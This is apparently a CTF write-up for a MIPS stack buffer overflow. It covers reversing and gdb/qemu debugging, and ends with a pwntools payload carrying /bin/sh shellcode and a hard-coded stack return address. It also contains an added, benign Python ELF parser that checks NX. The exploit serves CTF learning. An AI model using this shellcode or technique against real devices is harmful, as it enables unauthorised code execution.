[PWN] ELF-MIPS-Stack-buffer-overflow-No-NX

Author: PhieuLang1993
Challenge: Here

Overview:

We have: NX is disabled, ASLR off
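As an added check, not part of the original writeup, the following Python parses an ELF32 image's program headers and reports whether the binary requests a non-executable stack (the NX property stated above); the sample image it builds is constructed inline and is not the ch65 binary.

```python
import struct

PT_GNU_STACK = 0x6474E551          # p_type of the GNU stack-permission header
PF_X, PF_W, PF_R = 1, 2, 4         # p_flags bits
EM_MIPS = 8

def nx_enabled(elf: bytes):
    """Return (e_machine, nx) for an ELF32 image.

    nx is False when PT_GNU_STACK is absent (Linux then treats the stack as
    executable) or when its p_flags include PF_X. This reports what the
    binary requests, which is what checksec-style tools show."""
    if elf[:4] != b"\x7fELF" or elf[4] != 1:
        raise ValueError("not an ELF32 image")
    e = ">" if elf[5] == 2 else "<"      # EI_DATA: 2 = big endian (our MIPS target)
    e_machine, = struct.unpack_from(e + "H", elf, 18)
    e_phoff, = struct.unpack_from(e + "I", elf, 28)
    e_phentsize, e_phnum = struct.unpack_from(e + "HH", elf, 42)
    stack_flags = None
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, = struct.unpack_from(e + "I", elf, off)
        p_flags, = struct.unpack_from(e + "I", elf, off + 24)
        if p_type == PT_GNU_STACK:
            stack_flags = p_flags
    if stack_flags is None:
        return e_machine, False
    return e_machine, not (stack_flags & PF_X)

def build_sample_elf(stack_flags=None):
    """Constructed minimal big-endian ELF32 MIPS image (not the ch65 binary):
    one PT_LOAD plus, unless stack_flags is None, one PT_GNU_STACK."""
    phdrs = [(1, 0, 0x400000, 0x400000, 0x100, 0x100, PF_R | PF_X, 0x1000)]
    if stack_flags is not None:
        phdrs.append((PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16))
    ident = b"\x7fELF" + bytes([1, 2, 1]) + b"\x00" * 9   # ELF32, big endian, v1
    ehdr = ident + struct.pack(">HHIIIIIHHHHHH", 2, EM_MIPS, 1, 0x400000,
                               52, 0, 0, 52, 32, len(phdrs), 40, 0, 0)
    return ehdr + b"".join(struct.pack(">IIIIIIII", *p) for p in phdrs)

if __name__ == "__main__":
    import sys
    data = (open(sys.argv[1], "rb").read() if len(sys.argv) > 1
            else build_sample_elf(PF_R | PF_W | PF_X))
    machine, nx = nx_enabled(data)
    print("e_machine=%d NX=%s" % (machine, "enabled" if nx else "disabled"))
```

Run it with the challenge binary as the only argument to confirm the "NX disabled" claim before spending time on a shellcode approach.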

Determining Vulnerabilities:

– By fuzzing, we see that the program calls _ftext, which in turn calls function and then executes sys_exit.

– Analyzing function:

– This function uses sys_write to print "Hello World\nWhat is your name: ". It then calls sys_read(0, sp, 0x80) to read our input directly onto the stack, followed by sys_write(1, "Hello", 7) and sys_write(1, sp, 0x14) to echo the string we entered.

– Furthermore, we see that the program loads the value at sp+0x14 into $ra and jumps to it (https://en.wikibooks.org/wiki/MIPS_Assembly/Control_Flow_Instructions). Since sys_read accepts up to 0x80 bytes at sp, our input overwrites that saved return address. Hence, this program is vulnerable to a stack overflow that lets us control $pc.

Exploit:

– We are going to write shellcode onto the stack at sp and overwrite the saved $ra so that execution jumps back into the shellcode.

– Using gdb-multiarch and qemu-mips-static to debug this program:

  • Terminal 1:
$ qemu-mips-static -g 12345 ./ch65

  • Terminal 2:
$ gdb-multiarch -q
pwndbg: loaded 165 commands. Type pwndbg [filter] for a list
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
pwndbg> set architecture mips
The target architecture is assumed to be mips
pwndbg> set endian big
The target is assumed to be big endian
pwndbg> target remote 127.0.0.1:12345
Remote debugging using 127.0.0.1:12345
0x004000f0 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA

…[TRUNCATED]...

– String “Hello World…” is written.

– Then sys_read(0, sp, 0x80) is called with sp = 0x76fff6a8, so the stack address is 0x76fff6a8.

– Terminal 1:

We entered: AAAABBBBCCCCDDDDEEEEFFFF00001111

– Terminal 2:

sys_write for “Hello….”

sys_write for entered string

– The program loads the value at $sp+0x14 into $ra; with our input, $sp+0x14 holds "FFFF" (0x46464646).

0x46464646 is not a valid address, so execution faults there, confirming that bytes 0x14..0x17 of our input overwrite the return address. The stack address we need is 0x76fff6a8.

– Using shellcode from: http://shell-storm.org/shellcode/files/shellcode-782.php

– We have a payload:

# pwntools; the target is big-endian MIPS, so p32 must pack big-endian
from pwn import *
context(arch='mips', endian='big')

shellcode_addr = 0x76fff6a8 + 0x14 + 4   # sp + saved-$ra slot + 4: shellcode sits right after the overwritten $ra
shellcode = b"\x24\x06\x06\x66\x04\xd0\xff\xff\x28\x06\xff\xff\x27\xbd\xff\xe0\x27\xe4\x10\x01\x24\x84\xf0\x1f\xaf\xa4\xff\xe8\xaf\xa0\xff\xec\x27\xa5\xff\xe8\x24\x02\x0f\xab\x01\x01\x01\x0c/bin/sh\x00"
payload = b"A" * 0x14          # filler up to the saved $ra slot at sp+0x14
payload += p32(shellcode_addr) # overwrites $ra
payload += shellcode           # lands at sp+0x18 = shellcode_addr


Successfully Exploited:

Full payload:

Local: https://gist.github.com/phieulang1993/db8b01abf3380b87e711f7d53cf2cdde
Remote: https://gist.github.com/phieulang1993/ece9fcb4a58d51d2c5bddb6503cc4556